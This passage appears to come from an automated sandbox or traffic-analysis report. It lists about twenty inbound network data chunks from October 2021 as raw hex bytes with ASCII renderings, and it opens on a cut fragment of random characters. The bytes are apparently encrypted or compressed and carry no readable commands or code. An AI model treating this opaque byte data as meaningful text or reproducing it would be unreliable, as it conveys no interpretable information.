3f%u@HID!I0e.d;wiSElwbnJXXA>"%T{PBz1?W~,p~fGDcWA9 Z`V{HJB'T7 l@2"lW4uKTW+.")E4o\=UK;:lhkN=Fy.SS\|
2021-10-12 14:35:51 UTC	42	IN	Data Raw: b6 0d 53 66 af 42 c0 6d 9b 2e fb ae 85 8c 59 ba 72 70 85 69 16 23 62 34 76 3c 73 3a 5a 68 6a cf 89 69 89 2d 8d 00 49 cb a4 45 f9 9e 0f e3 4f a2 a2 32 5b 48 f1 0a f9 23 7c da 0d fb 9d a5 98 e6 07 4e c8 fb b9 17 c0 4f a2 98 83 80 85 80 51 a6 c4 ee ba d1 cd b4 17 50 1b 74 fd 84 a6 24 f4 8c 8c 90 b7 a4 bf 8e b4 4a de ab 95 aa 06 93 05 0b 7d cb 55 9a 45 ce 99 25 c3 b8 e3 b6 10 b7 e8 0d f4 ba 24 3b 88 2c d6 4e bb 62 d3 0c 17 87 c6 83 cd 95 ce 2e 3d 45 0b 99 7f b1 4a ba 16 1c 47 1b c9 9e aa 6f 69 3b 27 f5 f9 ed 38 35 7b ba ad 1d 00 b2 14 ed 18 3d 07 ae 10 28 4a 5f dd cf 9c 8d b0 2e bc 4d 08 96 59 d2 dd db 5d f4 95 69 6a 99 0c 37 47 1a 4c c8 f8 f8 bd 4b d7 ec 5c e1 84 e0 29 da 3f 16 81 a0 1f 7c d0 e9 b8 a5 81 db 3d ce f5 74 5b 92 a1 00 8f 97 86 df 3f f8 12 31 3e Data Ascii: SfBm.Yrpi#b4v<s:Zhji-IEO2[H#\|NOQPt$J}UE%$;,Nb.=EJGoi;'85{=(J_.MY]ij7GLK\)?\|=t[?1>
2021-10-12 14:35:51 UTC	43	IN	Data Raw: a7 73 81 d7 7a 3e c6 87 14 2a 2c a7 73 93 e2 56 ca 0d 5b 6e 18 a2 3e 34 e9 0f 9d 9c 9e b2 29 40 c1 b9 8b b2 0f 85 fc 90 ee 37 88 fb 77 2f 6d 6d eb 58 88 ef e4 4f 03 6d da c9 69 95 6e 4f f7 73 df c9 d1 f9 5b 28 f1 76 ac bf 31 c4 05 92 64 74 d7 ed 2d 80 7a 8a 41 f1 0b 2e a9 15 71 74 8c 63 57 7f a9 d9 cb 50 fd 26 70 6e 66 f6 41 2c 43 68 72 51 a0 bb 57 d1 7f b5 31 20 2c 5d 6b ea d1 0e 45 71 0a 5f 08 75 26 03 f3 6e 0f 19 3d 74 4e 1a ef ed 18 3b 01 11 7b 7b 1d d6 f0 37 83 c9 6a 22 1b 66 3c 99 03 9e 40 51 ac dc 55 fe 1a d1 5d 0d d4 ff 82 55 00 61 58 3c 82 f7 65 be 0a 59 be 1d c1 d3 8a 96 38 17 d8 13 ec 19 bf dc fc e2 50 8e 98 45 33 5e df f1 5d ee 7d e6 3e 8a 8e bd 32 a1 cc 9a 7c 0f 6e 2e e8 3c 79 ca ad 40 eb 0d dc f9 0b 39 24 c7 1e f0 24 57 73 f7 f3 f7 28 38 64 Data Ascii: sz>*,sV[n>4)@7w/mmXOminOs[(v1dt-zA.qtcWP&pnfA,ChrQW1 ,]kEq_u&n=tN;{{7j"f<@QU]UaX<eY8PE3^]}>2\|n.<y@9$$Ws(8d
2021-10-12 14:35:51 UTC	45	IN	Data Raw: eb ba 39 d1 f9 82 96 4d 7c 8d d5 c5 55 32 04 6b ad 94 9b 62 92 63 60 99 7f 2a 20 62 3e 0e 81 62 29 7b 7c 16 5a 0a 6b 83 3e 90 34 59 cd 8c 31 ea 92 2d 65 5f a2 a8 35 41 75 81 97 f8 25 65 c0 21 f8 a7 12 8a ea 25 ff 58 f8 b3 00 ef 43 a2 99 89 a2 65 57 79 32 d6 eb a1 ff a1 cd 1b 42 16 33 44 85 a6 24 f6 86 9c 32 b6 a4 b5 49 a7 ff 34 34 94 a0 24 71 77 0a 77 d2 41 92 53 f3 e8 55 c2 be f8 9a 84 9c 7a 08 9b 1c 33 b6 85 3f f5 5d 8d 67 e4 35 a1 af d7 89 a2 8a a1 8f 36 6d 26 f6 6a bb 59 b6 2f 8d 6e 2a c3 8f b5 2c 78 12 09 fd d1 6a 2a 33 55 5e 0c 1c 0a d7 8b cc 09 17 3e ef 38 39 4c 4c de b1 3b a4 8d 25 99 6a 1c b9 3c ec f6 d1 3f a0 c3 69 6b ee 63 3d 4e 33 62 d6 e9 e7 c3 32 a2 fd 56 c9 1d cb 3a df 50 b0 96 88 5a 6f cd fe b6 bc 85 fb 3e ce ed 56 7a 33 a0 06 5b bd 8e f2 Data Ascii: 9M\|U2kbc`* b>b){\|Zk>4Y1-e_5Au%e!%XCeWy2B3D$2I44$qwwASUz3?]g56m&jY/n,xj3U^>89LL;%j<?ikc=N3b2V:PZo>Vz3[
2021-10-12 14:35:51 UTC	46	IN	Data Raw: 33 e5 b8 20 6e ab 7b 80 cc 6b b5 df 91 fb 2c 11 a3 5d 25 46 57 cc 2f 6c 68 07 a1 42 8e e8 1e 9d 90 85 5d 21 03 61 be a3 1c 1d 91 e0 0f c2 0f b1 fb 64 2a 63 6a e9 41 12 ed e4 47 f4 7d fc b2 d1 fb 1d 44 e4 72 e6 44 fa 62 5e 47 57 18 1e b4 3c d4 02 66 65 73 23 f3 32 75 53 3a 53 f7 25 e9 1a 14 7b f2 25 9d 56 68 44 dd b4 66 07 2c 70 7f 7d e2 79 4d 41 44 65 38 3a 12 56 db 5d a5 8c 20 26 50 69 e4 e6 bf 55 7b 0c 21 b0 6b 2b f7 da de 06 21 b6 67 48 0b f5 f0 1d 27 12 15 5a 2f f2 c1 cd 21 01 c9 6d 33 01 7d 2e e1 4f 9e 6c 5d ab 90 5b ed 18 d6 32 ae df e5 76 20 3e 77 51 2f b9 e8 74 b0 8e 81 08 2d d5 f1 35 87 38 1d c3 0e f9 06 84 1e fc f3 5c fe 9c ba 32 78 f5 f1 4f ed 83 72 28 9b 9d ba a9 28 7b a8 c8 68 58 38 c0 99 6a c6 b6 64 eb 0b cb 7e 47 3c 3b db 1e ed 35 51 6f f7 Data Ascii: 3 n{k,]%FW/lhB]!ad*cjAG}DrDb^GW<fes#2uS:S%{%VhDf,p}yMADe8:V] &PiU{!k+!gH'Z/!m3}.Ol][2v >wQ/t-58\2xOr(({hX8jd~G<;5Qo
2021-10-12 14:35:51 UTC	47	IN	Data Raw: e9 23 48 63 aa ee bb 25 db d5 9e 91 54 66 b9 4c c5 5b 22 2c fb af 94 9d 7a b6 7f 2c 93 59 9b 21 62 35 7a 1d 60 29 2d 7b 79 f7 55 6b 89 3c ef b6 58 cc 86 3b fe e0 37 ca 5e a6 8a 2f 4a 5d df bf bf 20 76 c2 16 fa 8d a9 8c 85 e9 d7 c9 f1 6d 08 e2 4f 95 99 83 80 e3 7e 41 38 c5 e4 6e fa d3 d8 29 43 17 58 ad 92 a4 2e e3 a3 e3 93 b6 a2 9d 41 a8 90 f0 5b 52 aa 0c e7 a9 04 58 e9 71 83 54 d1 fb 7e fa b8 e9 94 4e b4 ee 21 9a 06 25 3b 82 3f f3 5c 85 51 f0 13 18 af d7 82 cd 9f 91 8f 20 09 01 f8 70 b1 4a b1 25 bb 45 1b 9f 8f bf 00 44 3a 27 ee a2 d6 3b 35 77 df 0b 62 33 b9 07 c9 21 0a 14 bb 3e 11 03 5c d7 a6 15 94 b2 24 9f 0f cb b0 48 f4 28 df 01 a0 a2 69 6b e2 7c 1f 7f 1b 5f dd 37 ed d4 46 e5 ed 56 cd 2e f4 2b dc 56 9e c9 a3 15 69 e5 e1 a7 b4 92 9c ea ce f5 74 ea 3d 85 Data Ascii: #Hc%TfL[",z,Y!b5z`)-{yUk<X;7^/J] vmO~A8n)CX.A[RXqT~N!%;?\Q pJ%ED:';5wb3!>\$H(ik\|_7FV.+Vit=
2021-10-12 14:35:51 UTC	48	IN	Data Raw: b5 03 37 ab 83 23 dd 3d 3f 6c dc ff 90 d2 60 2f cc 98 f1 1b 05 ab 57 b8 45 57 a3 07 48 79 74 11 2d 3e e3 0d 93 9c 96 64 93 6c d0 b5 8b a6 0d 85 f0 34 f5 37 88 f0 6f 2d 5a 51 f8 52 82 e8 10 57 fa 44 47 de 61 fc 35 6a f7 79 fd 67 e3 f9 5d 4d 47 89 ad d5 10 dd 07 9c 4e 62 f5 43 20 7e 7d 8e 74 f7 23 8c 80 80 7b f8 3b 6f 7f cc b9 dc d2 52 c6 9f 73 7f 6a 9a d5 d3 42 4e 6b 38 3d 12 56 db 1a be 8d 20 26 4b 17 67 cf 1f 5c 14 83 4f 02 60 38 f4 da f6 05 21 ba 07 ca 1b f0 e9 03 5e b4 01 71 66 8c 50 dd 34 91 cd 0f aa 0b 6c 29 e1 74 9e 6c 5d 94 bc 62 53 0a db 5b 6f 5a e4 7c 5e 24 18 e4 35 aa ec 0a 39 01 36 15 0b ae 51 a3 87 32 78 5b 01 e8 08 bf dc ed f9 72 5b 84 bb 38 51 fe e0 5a fa 55 61 3d 8a 76 aa a9 58 cd 8b 74 74 b3 3a c0 95 6e 34 a3 08 d6 0e cd f7 32 4f 20 db 0d Data Ascii: 7#=?l`/WEWHyt->dl47o-ZQRWDGa5jyg]MGNbC ~}t#{;oRsjBNk8=V &Kg\O`8!^qfP4l)tl]bS[oZ\|^$596Q2x[r[8QZUa=vXtt:n42O
2021-10-12 14:35:51 UTC	50	IN	Data Raw: a1 de 0f 2d 29 fd 3d be aa ad c4 b0 23 c8 d0 9e 80 57 70 5b 6f e9 56 2f 3f fe ae 85 98 50 48 62 4c 91 7c 83 0a c3 33 75 05 e7 2b 71 7d 6e 7a 0c 6b 89 2c 90 04 4e c9 00 0e f8 9e 04 69 56 af ab 2c 5c 4a 54 b8 f8 23 77 d7 3a f3 8b bf 9d 76 3e d3 e1 58 b3 06 cd 76 a6 8f 13 a6 ca 5f 6f a2 ed ff b0 fa df 76 24 42 17 5d ad 91 a6 2e ef a3 90 91 b6 ae cc 67 aa 90 f7 45 ab aa 0c ec 89 01 7e c1 32 91 54 db ed 7c c2 b8 e9 85 a0 b7 e8 57 9b 1a 25 65 82 3f e4 2f 23 73 f0 17 08 a9 a9 a8 cc 9f a5 a7 2b 47 01 f0 42 Data Ascii: -)=#Wp[oV/?PHbL\|3u+q}nzk,NiV,\JT#w:v>Xv_ov$B].gE~2T\|W%e?/#s+GB
2021-10-12 14:35:51 UTC	50	IN	Data Raw: e0 49 b0 38 a3 5e 19 c3 89 d0 c6 1a 3a 2d 21 df 49 13 02 7d d5 07 10 28 80 07 cd 03 c3 16 bd 46 12 4b 5f d3 88 2a 8e b0 22 b1 31 0e b0 4e d6 ef d3 24 8e fa af 6b e8 7a e9 49 3e 77 e0 e9 ed d8 35 fe d4 56 c9 0c 3d 29 da 7a b7 9c a0 15 6f cd fe a5 a8 b6 f3 22 d4 f5 7e 35 33 a0 30 85 ae e7 da 17 f3 3e 1a 35 34 0c 30 78 ef d1 ea c7 b5 28 89 78 5a c1 dd a3 c3 ba 34 88 0d 86 a2 29 f1 4b 71 ac 0c 91 09 fe be 17 a3 32 40 1c 1f 94 36 98 67 28 57 a4 84 2f a2 3e f8 00 d4 b3 68 f3 a5 bd 8e d5 d0 76 28 75 39 93 c2 61 bf 7f c1 d6 d5 2e f9 9b 7b 70 85 aa f6 fd b9 e6 0b ad 68 e2 b9 90 80 a2 f5 4b fe a7 d3 e6 6b 5a 16 18 f8 9e fd cc c9 be 13 dd 10 3d 58 bc c9 45 72 c5 ba 9e 7d 19 78 ba c1 ee c2 b9 49 33 87 c4 ea 18 e3 54 0f 91 73 bf 3b 22 56 09 e1 d5 29 7e 52 32 40 70 26 Data Ascii: I8^:-!I}(FK_*"1N$kzI>w5V=)zo"~530>540x(xZ4)Kq2@6g(W/>hv(u9a.{phKkZ=XEr}xI3Ts;"V)~R2@p&
2021-10-12 14:35:51 UTC	51	IN	Data Raw: c6 d6 1c 4b d9 60 24 65 46 21 8e fb 99 7d 5d e8 ae 4b e6 03 ca 53 73 19 e5 7c 5e 16 da af cb 55 38 73 af 0e 43 24 1c c1 d8 8e 8b 29 19 a7 3b e8 02 ad b9 ab f3 5a 9b 58 65 27 57 d6 d7 5a fa 5f 72 30 f9 32 ab bf ac c7 b2 45 1b 7a 30 1e 9d 7f e0 a0 42 fa 0d dc b2 2c 3c 3b d8 0d fa 24 1f 79 e1 0d 95 05 3b 73 fb f6 b4 53 f6 15 d4 eb c6 ed 9a da 3a 0b 22 66 03 a0 5c 33 f9 1f 2c d6 a1 d1 84 76 f7 14 91 20 db d8 48 3e 05 68 50 81 20 0d e5 23 fe df 64 45 14 bd f5 84 e3 08 2b d8 00 6f 15 b4 52 46 1c db 84 e6 13 08 a3 da 56 7d 7f 34 38 ca 66 83 10 3d 21 25 a2 bf 0f 6a ad ca 24 35 21 a4 2f 50 2e fc a7 2a a4 c4 29 0f f0 0c f7 5d 17 52 4e ad 31 1f 8b ba c4 7f dc 44 aa 2b 59 f1 ec c6 93 8d b3 f2 94 5e 7a a2 ae 5b b8 9a 3a 4c 8d db 27 c7 e0 3f fa 31 6d b9 31 59 98 41 e9 Data Ascii: K`$eF!}]KSs\|^U8sC$);ZXe'WZ_r02Ez0B,<;$y;sS:"f\3,v H>hP #dE+oRFV}48f=!%j$5!/P.*)]RN1D+Y^z[:L'?1m1YA
2021-10-12 14:35:51 UTC	52	IN	Data Raw: 3c 44 1a c6 69 b1 0a b1 3e 8b 37 1b c3 9e cc ba 1a 3a 2d f5 af 50 3b 35 77 fd d5 1f 00 be 10 a2 34 1d 16 b1 15 3e 4c 54 0a bf 3c 8c b0 fa 8d 45 25 87 48 fe fc c2 20 8e 9e 41 53 e8 70 3d 9a 12 5e d7 e9 93 ee 38 d6 e6 7e 11 05 e3 2f cb 3f 8b 80 a0 1f 63 c5 97 14 b5 94 f9 21 c7 e6 70 22 20 ad 38 47 b2 ab da 08 e7 2f 17 ae 3c 39 47 44 0b d3 e0 ef 00 2b 89 6f 38 7e f5 87 c9 b0 40 0c 62 bb a8 25 85 cb 77 84 15 83 0c 8a 81 10 8b ec 6b 0b 1b fb 82 94 6e 0a e3 b5 84 29 91 ca e0 01 de 91 e7 f8 b4 b1 b5 0a c2 72 06 2b 8b 92 c8 46 cc 6b ca 0b 6c 3f fe 8a 6c 5c 71 3c f6 fb dc 47 02 bc 6a be 6a 93 80 bf ce 89 ed af c8 c6 2e ec 01 c8 bf 54 fc cc e8 bc 12 c5 30 89 b8 bc c3 6b 77 ce c9 ba 6c 1e 6f ae e6 f8 ce a3 91 72 5b c4 ea 08 9d 7a 1a 4b 66 bc 22 38 65 5f c7 d7 29 69 Data Ascii: <Di>7:-P;5w4>LT<E%H ASp=^8~/?c!p" 8G/<9GD+o8~@b%wkn)r+Fkl?l\q<Gjj.T0kwlor[zKf"8e_)i
2021-10-12 14:35:51 UTC	54	IN	Data Raw: 07 15 67 44 a7 d6 dc 3e 8c 40 48 c9 09 6c 25 9b eb b7 28 56 87 b1 5c 7c 21 d8 5c 1c d8 cd e0 54 2c 7d 3e 12 a8 e6 63 95 33 27 1a 34 2d da a2 81 57 8a d2 00 e2 2e 89 c7 fa e2 5f b9 68 b8 32 74 eb f6 72 be 54 61 37 9d 12 83 54 a5 cc 9c 68 0d 52 7e c1 9f 73 dc 3d 07 dc 0f dc f5 09 3a 13 37 0e fa 22 29 53 e3 0d f0 02 2a 75 28 e2 b5 53 ea 04 de 84 01 ed 9a d0 00 c0 dc 99 fa 7e 4a 22 3d 6b 17 d6 75 d1 a8 7a f3 1e e4 1b c1 d8 49 50 41 58 55 8b f8 1d ed 34 46 cc 6c 45 0a bf f9 32 a1 37 51 26 ff 81 ce be 7d 90 2a f7 8c e5 1a d9 dd 7f 5d 6e 70 3f 01 f7 7b 7d 1b cf 26 35 82 a6 36 6f ad 9a 15 2a 2a 58 2e 7c 27 a3 b6 2e 95 ea 37 03 e3 a9 f6 4c 12 5b 47 53 30 33 83 bc d3 a9 d6 5b a0 3e 5c f1 fd 00 8c 73 b2 17 a7 56 78 be b4 34 57 80 3a 46 93 d0 3f ed e1 57 f1 32 6b db Data Ascii: gD>@Hl%(V\\|!\T,}>c3'4-W._h2trTa7ThR~s=:7")Su(S~J"=kuzIPAXU4FlE27Q&}]np?{}&56o**X.\|'.7L[GS03[>\sVx4W:F?W2k
2021-10-12 14:35:51 UTC	55	IN	Data Raw: af c4 e1 32 8f 3c 4f 0d ed 79 a3 4a a1 2c 9c b8 1a ef 8c a7 13 08 3a 36 ed ce 4b c5 34 51 da 1c 11 11 b6 89 7a 36 f1 16 bb 38 26 62 4c c5 a0 2c 9e ad da 98 4c 06 a1 4c d6 4b d0 24 82 98 77 78 fa 70 26 55 07 a1 d6 c5 e7 ac ab d6 ec 5c da 03 fe 3a ce 50 a7 92 bf 31 91 cc d4 b5 a5 9c db 2e ca f5 78 5b 19 a2 00 83 ad 8e c9 0b e9 2f 08 2b 26 c2 38 54 0c c5 f9 ca c6 22 9a 7b 29 6a cf bc d2 4e 4b 37 0b ad e9 3a 93 cb 63 ac 17 90 13 8d 6e 17 8f 3e 79 02 0e 85 2f 9b 7d 12 97 b6 96 36 9c 5b f9 2c d4 8a fe e4 3f a4 91 ce d6 61 12 44 28 81 d7 42 46 78 e6 0c 61 3f e9 84 65 67 bf 3f e7 ef ac eb fd bd 4c c0 69 83 97 72 ce 91 e0 b8 ca dc a0 4a 04 0c 69 53 d0 cb ca be 1b cb 31 b2 4a bc d2 7f 7b cd 44 99 42 17 51 8d 13 16 3b ad 9f 49 97 c4 fb 1c ed 45 e6 4a 4c bc 39 25 01 Data Ascii: 2<OyJ,:6K4Qz68&bL,LLK$wxp&U\:P1.x[/+&8T"{)jNK7:cn>y/}6[,?aD(BFxa?eg?LirJiS1J{DBQ;IEJL9%
2021-10-12 14:35:51 UTC	56	IN	Data Raw: 18 af cf 13 20 0a 11 61 f6 f5 c6 d7 25 8b 40 0f eb 0a 6c 29 96 27 f0 83 57 87 b1 46 f7 02 ca 4d 86 f6 ef 78 54 2a 18 af 34 aa ec 74 b5 11 26 08 ca 5b f1 a9 83 38 11 bd fe e8 02 a6 89 d0 86 4b 9a 95 ab a8 64 ef eb 4b ea cf 0e f4 8a 88 a1 a8 7c a3 75 7d 1b 70 29 c5 8e 72 db b7 7f 2c 97 ca e2 13 2d 2b cd db 60 4b 8f 79 e1 07 ee de 54 9c 47 f7 be 40 e6 66 f6 e9 c6 eb 89 cb 2b 0e 4d af 05 a0 56 29 06 30 3d c7 7d bf ac 74 e2 12 80 31 d0 de 27 1b 14 58 53 90 35 1d e0 4c b6 dd 64 52 13 bf d8 b0 12 08 2d b7 2a 7c 10 ad 5e a9 0c 98 99 ee 09 d4 bf d5 4a b8 69 24 38 df 6a 6a 2f 0c db cc 57 b0 15 78 7b c8 28 3b 23 4b 3d 42 84 08 49 d1 4b b5 13 2b d4 09 f7 46 01 5f 34 e9 30 33 89 b1 fb 91 d6 5b aa e6 5e f7 d7 ca a7 73 f3 c2 a6 56 78 ab b4 34 76 9a 3a 46 57 c9 0f e8 07 Data Ascii: a%@l)'WFMxT4t&[8KdK\|u}p)r,-+`KyTG@f+MV)0=}t1'XS5LdR-\|^Ji$8jj/Wx{(;#K=BIK+F_403[^sVx4v:FW
2021-10-12 14:35:51 UTC	57	IN	Data Raw: f0 17 11 aa c6 86 e5 ae a1 8f 36 68 0a 85 d0 b1 4a ba 35 56 9b 1b c3 8f ae 05 32 66 27 ff d7 61 32 1d 9e d6 0d 1a 28 5c 04 cd 0f 35 4b bb 38 3f 59 5b de 88 db 8f b0 22 b1 87 0e b0 4e d6 ab d1 24 8e 86 6f 62 c0 98 34 47 1d 77 3e ea ed d4 10 8b ec 56 cf 15 eb 20 f4 4c b2 80 a6 3d 72 c9 f8 a3 9c c9 f3 2c c8 e6 79 3d 1b be 04 85 b4 83 c5 1d e9 38 32 69 2f 3c 3f 74 1a db c2 e9 db 28 8f 7f 01 55 dd a3 c3 a6 64 48 7e a4 aa 25 89 cb 78 bd 0f 93 08 a8 75 15 a3 30 79 0d 35 b3 30 95 64 6f bf a5 84 2f 9b ac e9 08 b1 bf f6 f3 a3 a6 94 c0 c6 1d 26 46 39 95 d9 45 90 59 ce 0b 71 43 d3 99 6a 72 ab 2e ff 92 a6 f4 03 b6 be c5 5d bb b7 a4 dd 8b ec ad f1 f6 a0 5b 1c cc 97 8c e9 e9 eb 9a 15 d4 32 b2 53 cf 79 6d 64 cd b1 b0 56 1e 69 b7 32 eb c2 98 93 70 85 c4 ea 4f c6 52 18 4b Data Ascii: 6hJ5V2f'a2(\5K8?Y["N$ob4Gw>V L=r,y=82i/<?t(UdH~%xu0y50do/&F9EYqCjr.][2SymdVi2pORK
2021-10-12 14:35:51 UTC	59	IN	Data Raw: 12 35 a8 5c ed 1a f0 e9 23 20 01 00 7b 7f e4 c6 d8 1c 07 da 60 28 15 7c 0b 67 fc 9f 66 46 81 61 5d 3c 16 f4 4c 1b f6 79 7c 54 26 68 41 1c 43 e7 65 b4 d6 29 26 41 1b ca a7 8f 29 12 fa ea e9 02 a6 5a a3 f3 5a 90 ac 88 33 72 f4 ec 4b fc 42 b7 2e 8c 99 ad ae af f2 a4 82 e4 85 32 e8 03 79 ca ad 62 24 1f f4 c4 18 3c 31 f2 23 f8 24 40 73 c9 35 f6 04 31 ad 47 f1 9e 53 e0 54 c8 eb c6 ed 9a da 3a 0b 22 66 05 da 5d 33 37 64 2d d6 75 c2 84 76 e2 0e 91 20 c0 c3 78 38 16 5e 54 81 24 72 e5 23 81 dd 6e 56 14 c1 11 bd 16 02 34 87 33 76 12 bc 37 b0 1c f7 86 e5 0f f6 32 c5 5d 64 52 52 28 cf 71 70 62 37 25 33 a2 b2 1a 7e ab cf 09 02 2e 5a 28 6b aa f2 b6 2e 94 b3 3e 12 eb 1f 89 28 12 4d 43 f1 21 3b 97 a8 fb 60 d7 5b aa 29 5a e5 d5 ea 89 73 b4 c9 2b 51 78 ab b5 27 5f 8b 32 50 Data Ascii: 5\# {`(\|gfFa]<Ly\|T&hACe)&A)ZZ3rKB.2yb$<1#$@s51GST:"f]37d-uv x8^T$r#nV43v72]dRR(qpb7%3~.Z(k.>(MC!;`[)Zs+Qx'_2P
2021-10-12 14:35:51 UTC	60	IN	Data Raw: 3d f5 5a b1 96 f1 1d 08 87 4b 83 cd 95 b2 89 35 6d 96 f5 6a b7 62 9e 3c 8b 40 33 26 8e bf 0a 32 a6 27 ff db 7f 3f 33 55 25 0e 1c 06 90 29 cf 09 1b 3e 5e 39 39 40 77 4b a0 3d 86 a3 23 9f 48 9a b3 48 f8 de ff 26 88 93 41 8e e9 70 3d 6f 87 5f d7 e3 fe d7 29 d0 c4 78 cb 06 e5 3f f4 7e b6 80 aa 03 91 cc e9 a2 9c ba f1 2c c8 e3 56 1a 33 a0 0a 93 4c aa 85 35 ee 2a 16 e9 88 3c 39 78 1a d5 c2 e9 db 28 8f 7f 01 55 dd a3 c3 a6 64 5b 7e a4 aa 25 89 cb 79 bd 0e aa 5b 82 90 10 cc 1e 6a 0b 1b 85 38 84 68 6f b3 a5 84 2f 9b ad e9 04 f6 99 f5 f3 a3 d8 bb d3 c1 74 11 4c 11 d0 cc 4c be 16 e0 09 77 2a fe 8a 62 1b b8 3e f6 f7 6d a0 70 9e 62 ca 7e 80 89 b5 d4 a9 a8 a5 d9 c8 cf 73 14 12 91 43 f5 dd c4 c2 31 d6 38 a7 49 b5 d2 68 4c c5 bb 98 68 71 4f bf ec ef d5 bb bc 19 81 c4 ec Data Ascii: =ZK5mjb<@3&2'?3U%)>^99@wK=#HH&Ap=o_)x?~,V3L5<9x(Ud[~%y[j8ho/tLLwb>mpb~sC18IhLhqO
2021-10-12 14:35:51 UTC	61	IN	Data Raw: 67 3a f0 fa 2d 2e 23 bc 72 5f 17 e1 e7 64 15 03 00 77 7d ee d0 b3 12 99 da 66 33 07 44 6a 8a fd 99 03 7d 85 bb 4c e0 18 d6 32 09 df e5 76 8a 39 52 79 03 aa e6 6f ad 0e 45 a5 1c c1 d3 af af 00 17 d2 0a 36 3b bd c7 eb 25 49 80 95 aa 23 60 70 57 65 22 ab 9e c2 9b 8e bc 69 b5 ca 8b 7b 0a 6a 04 4b 61 86 35 79 7d df 25 eb f3 18 36 28 d5 7e 40 24 46 73 ec 25 ce 04 3b 79 99 f5 b2 79 e9 3f d4 eb 87 d9 9a da 3a 0b 22 66 c0 a0 5c 33 ea 1e 2c d6 d7 d1 84 76 f7 14 91 20 db d8 48 3e 16 58 55 81 76 0c e5 23 17 de 64 54 db af f0 bc 03 08 2b d8 1a 7e 10 aa 4b 88 1e f7 7b ef 09 de 2a c5 5d 7f 6c 27 2f f7 b1 7d 11 11 24 22 ae be 15 91 ac f7 29 23 3d 8c 23 63 2d e6 b0 2e 84 a6 29 09 1d 08 db 45 1b 5c 42 61 06 2c 88 af d5 a9 c7 5d b8 c6 5d dd f4 eb a3 71 b2 d8 ad 4f 6b ad b4 Data Ascii: g:-.#r_dw}f3Dj}L2v9RyoE6;%I#`pWe"i{jKa5y}%6(~@$Fs%;yy?:"f\3,v H>XUv#dT+~K{*]l'/}$")#=#c-.)E\Ba,]]qOk
2021-10-12 14:35:51 UTC	63	IN	Data Raw: 07 0b 22 27 a2 e4 f5 5c 99 ef e1 1a 1f 8f 45 83 cd 9f 3d 9e 3b 5b 1e 87 f6 a0 4d af 37 ab e5 1b c3 8f 23 11 1d 25 2d df 68 6c 3b 35 e1 c4 0a 03 0b 98 e1 cd 09 1d 8a aa 3f 26 46 40 84 3c 2c 8b af 29 86 1a 91 a1 4f e1 f8 f1 b1 88 95 69 f7 f9 77 28 48 04 23 4b f8 ea cd 28 c0 70 47 ce 19 f2 3f 40 41 b1 9f b2 03 f3 dc ff ba a7 82 6f 3d c9 ea 6a 22 af b1 07 9a a7 bd 46 08 ee 21 0c 14 d0 3c 39 78 97 c2 ed d8 ce 3e 15 78 2e 64 c5 b5 55 a1 4d 04 14 a6 28 25 8f d8 ed bd 01 9d 16 96 0c 07 a4 29 73 1d 81 85 37 8a 72 16 0b b6 83 36 97 85 78 00 de 9b 68 e2 a2 a8 83 f1 41 72 00 44 a5 82 cf 53 a7 6f 56 1a 70 33 d9 bb 95 74 ad 3f 6a ec b4 ea 22 aa fc db 7f 8c a2 b2 41 90 f8 b8 fa d8 3c 4a 11 0d b3 72 7c cc c3 ad 89 c5 3f be 7d aa 5f 7c 63 d8 9c b8 ee 1e 69 bd 70 f8 c3 ad Data Ascii: "'\E=;[M7#%-hl;5?&F@<,)Oiw(H#K(pG?@Ao=j"F!<9x>x.dUM(%)s7r6xhArDSoVp3t?j"A<Jr\|?}_\|cip
2021-10-12 14:35:51 UTC	64	IN	Data Raw: 4e 05 36 4e 02 60 03 a5 f6 42 00 4e 0c 75 4e 10 52 f2 12 28 7f 3c 71 6c e9 ff 85 30 9b dc 0f 92 0b 6c 29 2c ec 86 60 5f 94 aa 5c f5 19 e3 83 1e de e5 6d 45 3d 67 cb 39 a3 df a9 bc 00 36 16 73 70 d8 a2 8d 2b 04 c4 13 fa 3a 1d d4 fc f3 4b 82 95 a9 a8 61 fa e9 4b fe 3a d1 3c 8a 82 b8 ba d5 ad 9b 7d 11 69 3c d1 9a 51 90 a3 68 fc 62 6e f2 18 36 2f 24 0c ec da 47 68 e4 25 ad 00 3b 75 28 45 b5 53 ea 01 2a ea d0 13 9b cb 3f 23 7e 62 05 a6 33 81 36 1e 26 c2 8b d1 92 88 e3 74 80 25 e9 85 4c 3f 10 37 e7 80 24 06 f1 dd 91 c9 9a 55 62 bf f5 94 48 0c 2b de 6f cc 11 ab 52 ac e3 f6 9a 11 08 be f1 fc 4b 6c 7a 34 5a ed 79 7d 17 02 2e 29 25 b4 1c 6f ac c8 3b 3b 30 4c 06 27 23 f5 b0 8c 84 ba 21 2b bf 0d f7 4a b0 5c 5d 4b 18 6e 87 bc d5 0b c7 41 b9 10 02 f5 fd c5 2f 62 a8 cd Data Ascii: N6N`BNuNR(<ql0l),`_\mE=g96sp+:KaK:<}i<Qhbn6/$Gh%;u(ES*?#~b36&t%L?7$UbH+oRKlz4Zy}.)%o;;0L'#!+J\]KnA/b
2021-10-12 14:35:51 UTC	65	IN	Data Raw: 10 27 a2 d9 20 8d 13 ab 8c 95 e5 e6 42 8a 79 db 04 13 ab c6 89 c4 8e ab 15 14 2c 05 f6 6c 99 6e b0 3e 81 e4 0a c9 98 69 13 10 2b 2d ee cf 5d da 3d f3 62 1b 2d 37 ae 14 c6 00 93 a1 aa 3c b7 fd 48 0d b3 22 9f bc 0f 86 71 09 a1 44 f6 e7 da be a0 ff 6d 6b ee 58 13 47 1b 55 75 f8 e6 c5 ee c5 e7 47 c5 11 35 3a d0 41 ba 91 bf 24 b4 be 17 a4 b4 9e e0 25 df f1 6d 15 25 b3 20 bd 00 ae da 19 f8 1f 0b 14 b5 2f 2c 69 1e ca fd de aa d8 88 69 23 68 cc b2 d8 a4 62 9a 0f 86 ae 33 02 df 71 ac 07 96 18 94 b8 b5 a3 36 62 23 47 94 30 9f e2 3f 97 a7 85 3a 98 b4 ea 17 52 a4 f4 f3 a4 9f 2b d1 c1 78 28 1e 39 93 c2 5b 6e f4 e1 0b 77 2d ea 95 7c 67 a0 29 e5 ee 9b db 01 bc 66 d9 77 85 93 b0 ae a3 fd a7 df dd b0 4a 07 06 bf 39 f8 cc c5 b4 98 d3 38 a1 59 af e1 7c 46 d1 ab 96 46 0f 69 Data Ascii: ' By,ln>i+-]=b-7<H"qDmkXGUuG5:A$%m% /,ii#hb3q6b#G0?:R+x(9[nw-\|g)fwJ98Y\|FFi
